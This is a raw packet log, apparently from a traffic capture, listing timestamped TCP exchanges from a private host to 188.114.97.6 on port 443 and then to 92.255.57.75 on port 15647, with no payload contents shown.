Dec 17, 2024 08:38:41.018750906 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.018822908 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.023116112 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.023219109 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.059403896 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.059598923 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.062149048 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.062273979 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.064136028 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.064219952 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.076750040 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.076757908 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.076798916 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.076834917 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.076862097 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.076893091 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.076983929 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.078615904 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.078867912 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.090853930 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.090873003 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.090910912 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.090939045 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.090964079 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.090990067 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.091062069 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.103244066 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.103259087 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.103395939 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.103419065 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.103853941 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.106925011 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.107060909 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.112118006 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.112416029 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.120042086 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.120081902 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.120120049 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.120134115 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.120148897 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.127218962 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.127259016 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.127302885 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.127337933 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.127373934 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.136085987 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.136125088 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.136159897 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.136167049 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.136197090 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.212500095 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.212541103 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.212615013 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.212615013 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.212641001 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.216078997 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.216243029 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.216248035 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.251714945 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.251796961 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.251806021 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.260652065 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.260689974 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.260703087 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.260720015 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.260721922 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.260732889 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.260756969 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.260953903 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.267329931 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.267364025 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.267398119 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.267402887 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.267427921 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.271617889 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.271656990 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.271687031 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.271692038 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.271722078 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.277561903 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.277589083 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.277663946 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.277663946 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.277672052 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.280128956 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.280505896 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.280510902 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.280607939 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.283963919 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.283998966 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.284084082 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.284084082 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.284090042 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.288312912 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.288346052 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.288427114 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.288427114 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.288433075 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.288692951 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.293541908 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.293575048 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.293713093 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.293713093 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.293730974 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.307682037 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.404875040 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.404896021 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.405194044 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.405215979 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.405900955 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.405946016 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.405952930 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.405980110 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.447385073 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.447407007 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.447527885 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.447539091 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.450608015 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.450948000 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.450953007 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.455914021 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.455931902 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.456063986 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.456063986 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.456070900 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.461906910 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.461922884 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.462136984 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.462141991 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.467828035 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.467844009 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.468059063 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.468067884 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.468862057 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.468998909 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.469007969 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.469405890 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.471875906 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.472088099 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.472096920 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.473380089 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.473481894 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.473488092 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.473567963 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.475102901 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.475522995 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.480442047 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.480459929 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.480581999 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.480590105 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.594219923 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.594254017 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.594301939 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.594312906 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.594439030 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.636097908 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.636107922 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.636138916 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.636149883 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.636259079 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.636259079 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.636286974 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.636406898 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.641407967 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.641416073 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.641443014 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.641537905 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.641537905 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.641545057 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.641592026 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.643810034 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.644052029 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.648226023 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.648268938 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.648302078 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.648307085 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.648384094 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.653270006 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.653306007 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.653418064 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.653418064 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.653424978 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.653743029 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.657609940 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.657644033 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.657738924 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.657738924 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.657744884 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.664037943 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.664056063 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.664154053 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.664159060 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.669294119 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.669317007 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.669528961 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.669537067 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.713433027 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.785922050 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.785943031 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.786005020 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.786012888 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.786053896 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.786072969 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.827678919 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.827696085 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.827764034 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.827774048 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.828016043 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.833228111 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.833245993 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.833308935 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.833316088 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.833353043 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.838598967 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.838634014 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.838706970 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.838716030 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.838758945 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.844578981 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.844615936 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.844651937 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.844657898 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.844722986 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.850419998 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.850452900 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.850518942 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.850524902 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.850555897 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.850569010 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.856002092 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.856034040 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.856133938 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.856133938 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.856141090 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.856199980 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.862164021 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.862193108 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.862262011 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.862277985 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.862306118 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.862323999 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.868597984 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.981909990 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.981945992 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.982055902 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.982083082 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:41.982105970 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:41.982156038 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.019973040 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.020014048 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.020097017 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.020121098 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.020143986 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.020158052 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.025346994 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.025378942 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.025419950 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.025428057 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.025465965 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.025475025 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.030677080 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.030715942 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.030755043 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.030761957 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.030802965 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.036943913 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.036979914 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.037048101 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.037055016 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.037100077 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.042469025 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.042504072 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.042566061 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.042572975 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.042609930 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.042629004 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.043355942 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.043463945 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.045114994 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.045202017 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.051525116 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.051558018 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.051636934 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.051644087 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.051685095 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.053066015 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.056746960 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.056782961 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.056931973 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.056938887 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.057264090 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.057508945 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.058746099 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.172333002 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.172372103 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.172420979 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.172446966 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.172472954 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:42.172489882 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.172518969 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:42.182337046 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:48.954823971 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.074579000 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.074727058 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.123574018 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.243274927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.243455887 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.363241911 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.363630056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.483414888 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.483530045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.603323936 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.603425980 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.723320961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.723432064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.843276024 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.843497992 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:49.963253021 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:49.963789940 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.083551884 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.083641052 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.203352928 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.203643084 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.278218985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.278353930 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.323271990 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.398025036 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.398171902 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.517923117 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.518134117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.637820959 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.639200926 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.758894920 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.758990049 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.878643990 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.878722906 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:50.998553038 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:50.998689890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:51.118436098 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.351202965 CET	49796	15647	192.168.2.11	92.255.57.75
